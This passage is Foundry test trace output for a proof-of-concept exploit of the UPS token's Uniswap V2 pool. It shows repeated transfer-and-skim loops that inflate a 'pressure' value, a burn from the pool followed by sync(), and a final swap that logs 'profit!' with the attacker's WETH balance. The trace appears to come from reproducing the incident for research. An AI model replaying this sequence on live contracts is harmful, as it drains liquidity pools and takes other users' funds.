    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199388836791259039979218 [1.993e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2 → 0x000000000000000000000000000000000000000000000fb5ea738675c944e620
    │   │   └─ ← [Return] true
    │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   ├─ [3262] weth::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   └─ ← [Stop]
    ├─ [5585] upsToken::transfer(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 199388836791259039979218 [1.993e23])
    │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 3668754596959166335617 [3.668e21])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2 → 0
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 6 → 7
    │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0x0000000000000000000000000000000000000000000023e786710b25862b2096 → 0x0000000000000000000000000000000000000000000024ae68a3af2f9eae2b17
    │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x000000000000000000000000000000000000000000000fb5ea738675c944e620 → 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2
    │   └─ ← [Return] true
    ├─ [37848] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::skim(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 273580088706112789921010 [2.735e23]
    │   ├─ [26652] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199388836791259039979218 [1.993e23])
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199388836791259039979218 [1.993e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2 → 0x000000000000000000000000000000000000000000000fb5ea738675c944e620
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   │   └─ ← [Return] true
    │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   ├─ [3262] weth::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   └─ ← [Stop]
    ├─ [5585] upsToken::transfer(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 199388836791259039979218 [1.993e23])
    │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 2822118890062614597973 [2.822e21])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2 → 0
    │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x000000000000000000000000000000000000000000000fb5ea738675c944e620 → 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 7 → 8
    │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0x0000000000000000000000000000000000000000000024ae68a3af2f9eae2b17 → 0x00000000000000000000000000000000000000000000254765681178a47dbc6c
    │   └─ ← [Return] true
    ├─ [37848] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::skim(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 273580088706112789921010 [2.735e23]
    │   ├─ [26652] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199388836791259039979218 [1.993e23])
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199388836791259039979218 [1.993e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2 → 0x000000000000000000000000000000000000000000000fb5ea738675c944e620
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   │   └─ ← [Return] true
    │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   ├─ [3262] weth::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   └─ ← [Stop]
    ├─ [2542] upsToken::myPressure(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 66864399287313047715701 [6.686e22]
    ├─ [0] console::log("after fake swaps preassure", 66864399287313047715701 [6.686e22]) [staticcall]
    │   └─ ← [Stop]
    ├─ [98808] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: 0x0000000000000000000000000000000000000000, value: 66864399287313047715701 [6.686e22])
    │   ├─ emit BurnedFromLiquidityPool(: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 66864399287313047715701 [6.686e22])
    │   ├─ [39272] 0xC67a3b1587B2421728750294f0A049E98Eb0DA65::generateSteam(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 66864399287313047715701 [6.686e22])
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 66864399287313047715701 [6.686e22])
    │   │   ├─  storage changes:
    │   │   │   @ 2: 0x00000000000000000000000000000000000000000000b89da4830f29264f7d07 → 0x00000000000000000000000000000000000000000000c6c65e7508339696fc7c
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000e28b9f1f90a70477f75
    │   │   │   @ 8: 0x00000000000000000000000000000000000000000000b89d96a258757eeb7d07 → 0x00000000000000000000000000000000000000000000c6c65094517fef32fc7c
    │   │   └─ ← [Stop]
    │   ├─ emit SteamGenerated(: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 66864399287313047715701 [6.686e22])
    │   ├─ [7593] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::sync()
    │   │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   │   └─ ← [Return] 7326852627540702226091 [7.326e21]
    │   │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   │   ├─ emit Sync(reserve0: 7326852627540702226091 [7.326e21], reserve1: 1370977028350625716 [1.37e18])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x63c7ebf30000000000001306b057f20f47b4000000000fb5ea738675c944e620 → 0x63c7ebf30000000000001306b057f20f47b400000000018d30818d6b58fd66ab
    │   │   └─ ← [Stop]
    │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   ├─  storage changes:
    │   │   @ 10: 0x00000000000000000000000000000000000000000000b89d96a258757eeb7d07 → 0x00000000000000000000000000000000000000000000c6c65094517fef32fc7c
    │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0x00000000000000000000000000000000000000000000254765681178a47dbc6c → 0
    │   │   @ 2: 0x000000000000000000000000000000000000000000005ff6ce3610abc33482f9 → 0x0000000000000000000000000000000000000000000051ce144417a152ed0384
    │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x000000000000000000000000000000000000000000000fb5ea738675c944e620 → 0x00000000000000000000000000000000000000000000018d30818d6b58fd66ab
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 8 → 0
    │   └─ ← [Return] true
    ├─ [541] upsToken::balanceOf(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 199388836791259039979218 [1.993e23]
    ├─ [24665] upsToken::approve(uniRouterV2: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: uniRouterV2: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xd930737ffa814cd96da69b30a93006de9a36dee6fce4901ef0447c9b8df79eee: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [92713] uniRouterV2::swapExactTokensForTokens(199388836791259039979218 [1.993e23], 0, [0x35a254223960c18B69C0526c46B013D022E93902, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1674046451 [1.674e9])
    │   ├─ [504] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::getReserves() [staticcall]
    │   │   └─ ← [Return] 7326852627540702226091 [7.326e21], 1370977028350625716 [1.37e18], 1674046451 [1.674e9]
    │   ├─ [48116] upsToken::transferFrom(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 199388836791259039979218 [1.993e23])
    │   │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 91718864923979158390440 [9.171e22])
    │   │   ├─ emit Approval(owner: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: uniRouterV2: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640563840068747216654089660717 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2 → 0
    │   │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0 → 0x00000000000000000000000000000000000000000000136c16f204fc64cc06a8
    │   │   │   @ 0xd930737ffa814cd96da69b30a93006de9a36dee6fce4901ef0447c9b8df79eee: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffd5c71c0821aecbd5292d
    │   │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 0 → 1
    │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x00000000000000000000000000000000000000000000018d30818d6b58fd66ab → 0x000000000000000000000000000000000000000000002bc614796bbc8d283d7d
    │   │   └─ ← [Return] true
    │   ├─ [36344] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::swap(0, 1322242954213069242 [1.322e18], UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [23162] weth::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1322242954213069242 [1.322e18])
    │   │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1322242954213069242 [1.322e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000012598cf618a211ba
    │   │   │   │   @ 0x4109765a2d44b528e2b6e456785738511b028f0ac6075cbbb414cc024cb82fa7: 0x0000000000000000000000000000000000000000000000001306b057f20f47b4 → 0x00000000000000000000000000000000000000000000000000ad2361d96d35fa
    │   │   │   └─ ← [Return] true
    │   │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   │   └─ ← [Return] 206715689418799742205309 [2.067e23]
    │   │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   │   └─ ← [Return] 48734074137556474 [4.873e16]
    │   │   ├─ emit Sync(reserve0: 206715689418799742205309 [2.067e23], reserve1: 48734074137556474 [4.873e16])
    │   │   ├─ emit Swap(sender: uniRouterV2: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 199388836791259039979218 [1.993e23], amount1In: 0, amount0Out: 0, amount1Out: 1322242954213069242 [1.322e18], to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x63c7ebf30000000000001306b057f20f47b400000000018d30818d6b58fd66ab → 0x63c7ebf300000000000000ad2361d96d35fa000000002bc614796bbc8d283d7d
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [199388836791259039979218 [1.993e23], 1322242954213069242 [1.322e18]]
    ├─ [534] weth::balanceOf(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1322242954213069242 [1.322e18]
    ├─ [0] console::log("profit!", 322242954213069242 [3.222e17]) [staticcall]
    │   └─ ← [Stop]
    ├─ [534] weth::balanceOf(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1322242954213069242 [1.322e18]
    ├─ emit log_named_decimal_uint(key: "After exploiting, Attacker WETH Balance", val: 322242954213069242 [3.222e17], decimals: 18)
    ├─  storage changes:
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0 → 0x00000000000000000000000000000000000000000000254765681178a47dbc6c
    │   @ 0xd930737ffa814cd96da69b30a93006de9a36dee6fce4901ef0447c9b8df79eee: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 12: 0 → 1
    │   @ 0x6693fd66acae514ed2305cd0b7604a94266e750f2e1cc984901c9bc7c8726a57: 0 → 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c
    │   @ 0x6693fd66acae514ed2305cd0b7604a94266e750f2e1cc984901c9bc7c8726a5a: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 12.85s (10.88s CPU time)

Ran 2 test suites in 14.18s (13.73s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
